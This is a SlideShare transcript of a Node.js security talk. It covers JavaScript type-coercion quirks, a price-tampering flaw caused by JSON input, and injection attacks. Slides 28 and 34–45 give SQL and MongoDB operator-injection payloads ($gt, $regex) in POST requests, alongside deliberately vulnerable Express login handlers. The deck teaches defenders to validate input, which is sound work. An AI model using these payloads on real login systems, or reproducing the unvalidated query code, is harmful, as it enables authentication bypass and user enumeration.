Download as PDF, PPTX
![var foo = [0];
console.log(foo == !foo); // true
console.log(foo == foo); // true](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-9-320.jpg)
![Node (0.10.35) Chrome (40.0) Firefox (34.0)
[] + [] "" "" ""
[] + {}
"[object
Object]"
"[object
Object]"
"[object
Object]"
{} + []
"[object
Object]"
0 0
{} + {}
"[object
Object][object
Object]"
NaN NaN](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-12-320.jpg)
![1 / [] // Infinity
1 / {} // NaN](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-13-320.jpg)
![1 / [1] // 1
1 / [[1]] // 1
1 / [[[1]]] // 1](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-14-320.jpg)
![1 ^ [] // 1
1 ^ {} // 1](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-15-320.jpg)
!["5" * 5 - "1" // 24
"5" * 5 - [] // 25](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-16-320.jpg)
![{
"code": "USD",
"quantity": [],
"item": "tie"
}](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-23-320.jpg)
![var obj = JSON.parse(input);
var price = Math.round(
[] * 5;
);
// => price = 0](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-24-320.jpg)
![POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
username[$gt]=&password[$gt]=](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-38-320.jpg)
![a[0]=1 → a = [1]
a[0]=1&a[1]=2 → a = [1,2]
a[b]=1 → a = {b:1}
a[b]=1&a[c]=2 → a ={a:1, c:2}](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-40-320.jpg)
![POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user[$regex]=ab.c&pass=abc123](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-42-320.jpg)
![POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user[$regex]=ab.c&pass=abc123
POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user[$regex]=ba.c&pass=abc123
POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user[$regex]=cd.e&pass=abc123
POST http://target/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user[$regex]=dc.e&pass=abc123](https://image.slidesharecdn.com/preso-150202040145-conversion-gate01/85/Security-Challenges-in-Node-js-45-320.jpg)
Uploaded byWebsecurify
Security Challenges in Node.js
The document discusses security challenges associated with Node.js and NoSQL, highlighting common misconceptions about their safety. It provides various JavaScript code examples that demonstrate unexpected behaviors and potential vulnerabilities, particularly in handling JSON and user inputs. Recommendations include always validating user-supplied input to mitigate security risks.
More Related Content
Similar to Security Challenges in Node.js
Security Challenges in Node.js
- 1.
- 2.
- 3. Our Assumptions • Node.jsis a safe programming language • NoSQL is a safe alternative to SQL • Node.js + NoSQL = win
- 4. –Isaac Asimov “Your assumptionsare your windows on the world. Scrub them off every once in a while, or the light won't come in.”
- 5.
- 6.
- 7. (2 + "3");// 23 (2 + + "3"); // 5 (+""); // 0 (2 * "3"); // 6
- 8. 0 === -0//true 1/0 === 1/0 //true 1/0 === 1/-0 //false
- 9. var foo =[0]; console.log(foo == !foo); // true console.log(foo == foo); // true
- 10.
- 11. var hex =0xFF55 << 8; // Shifting by 8 bits adds 0x00 at the end alert(hex.toString(16)); // 0xFF5500 // Before 0x800000 it's ok alert((0x777777 << 8).toString(16)); // 0x77777700 // After 0x800000 it's not ok alert((0x888888 << 8).toString(16)); // -0x77777800, WTF?
- 12. Node (0.10.35) Chrome(40.0) Firefox (34.0) [] + [] "" "" "" [] + {} "[object Object]" "[object Object]" "[object Object]" {} + [] "[object Object]" 0 0 {} + {} "[object Object][object Object]" NaN NaN
- 13. 1 / []// Infinity 1 / {} // NaN
- 14. 1 / [1]// 1 1 / [[1]] // 1 1 / [[[1]]] // 1
- 15. 1 ^ []// 1 1 ^ {} // 1
- 16. "5" * 5- "1" // 24 "5" * 5 - [] // 25
- 17.
- 18. var obj =JSON.parse(input); var price = Math.round( obj.quantity * 5 );
- 19.
- 20. var obj =JSON.parse(input); var price = Math.round( 1 * 5 ); // => price = 5
- 21.
- 22. var obj =JSON.parse(input); var price = Math.round( {} * 5; ); // => price = NaN
- 23.
- 24. var obj =JSON.parse(input); var price = Math.round( [] * 5; ); // => price = 0
- 25. var quantity =obj.quantity || 1; // --- var price; switch (obj.item || 'tie') { case 'tie': price = 5.76; break; case 'socks': price = 1.56; break; // --- default: price = 1.56; // --- break; } // --- var total = cur * quantity * price; // --- res.writeHead(200, 'OK', {'Content-Type': 'application/json'}); res.end(JSON.stringify({total: Math.abs(total).toFixed(2)})); var obj; try { obj = JSON.parse( chunks.join('')); } catch (e) { res.writeHead(500); res.end(); // --- return; } // --- var cur; switch (obj.code || 'USD') { case 'USD': cur = 0.9; break; case 'GBP': cur = 0.5; break; // --- default: cur = 0.9; // --- break; } // ---
- 26. var quantity =obj.quantity || 1; // --- var price; switch (obj.item || 'tie') { case 'tie': price = 5.76; break; case 'socks': price = 1.56; break; // --- default: price = 1.56; // --- break; } // --- var total = cur * quantity * price; // --- res.writeHead(200, 'OK', {'Content-Type': 'application/json'}); res.end(JSON.stringify({total: Math.abs(total).toFixed(2)})); var obj; try { obj = JSON.parse( chunks.join('')); } catch (e) { res.writeHead(500); res.end(); // --- return; } // --- var cur; switch (obj.code || 'USD') { case 'USD': cur = 0.9; break; case 'GBP': cur = 0.5; break; // --- default: cur = 0.9; // --- break; } // ---
- 27.
- 28. SELECT * FROMusers WHERE username = '$user' AND password = '$pass' SELECT * FROM usersWHERE username = '' or 1=1--' AND password = ''
- 29. mysql_query("SELECT * FROMusers WHERE username = '$user' AND password = '$pass'");
- 30.
- 31. app.post('/', function (req,res) { var query = { username: req.body.username, password: req.body.password }; db.users.find(query, function (err, users) { // TODO: handle the rest }); });
- 32. app.post('/', function (req,res) { var query = { username: req.body.username, password: req.body.password }; db.users.find(query, function (err, users) { // TODO: handle the rest }); });
- 33. Comparison Logical ElementEvaluation Array Projection $gt $and $exists $mod $all $ $gte $nor $type $regex $elementMatch $elementMatch $in $not $text $size $meta $lt $or $where $slice $lte $ne $nin
- 34. POST http://target/ HTTP/1.1 Content-Type:application/json { "username": {"$gt": ""}, "password": {"$gt": ""} }
- 35. app.post('/', function (req,res) { var query = { username: {"$gt": ""}, password: {"$gt": ""} }; db.users.find(query, function (err, users) { // TODO: handle the rest }); });
- 36. app.post('/', function (req,res) { var query = { username: req.param('username'), password: req.param('password') }; db.users.find(query, function (err, users) { // TODO: handle the rest }); });
- 37. app.post('/', function (req,res) { var query = { username: req.param('username'), password: req.param('password') }; db.users.find(query, function (err, users) { // TODO: handle the rest }); });
- 38. POST http://target/ HTTP/1.1 Content-Type:application/x-www-form-urlencoded username[$gt]=&password[$gt]=
- 39. app.post('/', function (req,res) { var query = { username: {"$gt": ""}, password: {"$gt": ""} }; db.users.find(query, function (err, users) { // TODO: handle the rest }); });
- 40. a[0]=1 → a= [1] a[0]=1&a[1]=2 → a = [1,2] a[b]=1 → a = {b:1} a[b]=1&a[c]=2 → a ={a:1, c:2}
- 41. app.post('/', function(req, res){ User.findOne({user: req.body.user}, function (err, user) { if (err) { return res.render('index', {message: err.message}); } // --- if (!user) { return res.render('index', {message: 'Sorry!'}); } // --- if (user.hash != sha1(req.body.pass)) { return res.render('index', {message: 'Sorry!'}); } // --- return res.render('index', {message: 'Welcome back ' + user.name + '!!!'}); }); });
- 42. POST http://target/ HTTP/1.1 Content-Type:application/x-www-form-urlencoded user[$regex]=ab.c&pass=abc123
- 43. { user: {$regex: "ab.c"}, pass:"abc123" }
- 44. app.post('/', function(req, res){ User.findOne({user: {$regex: "ab.c"}}, function (err, user) { if (err) { return res.render('index', {message: err.message}); } // --- if (!user) { return res.render('index', {message: 'Sorry!'}); } // --- if (user.hash != sha1("abc123")) { return res.render('index', {message: 'Sorry!'}); } // --- return res.render('index', {message: 'Welcome back ' + user.name + '!!!'}); }); });
- 45. POST http://target/ HTTP/1.1 Content-Type:application/x-www-form-urlencoded user[$regex]=ab.c&pass=abc123 POST http://target/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded user[$regex]=ba.c&pass=abc123 POST http://target/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded user[$regex]=cd.e&pass=abc123 POST http://target/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded user[$regex]=dc.e&pass=abc123
- 46.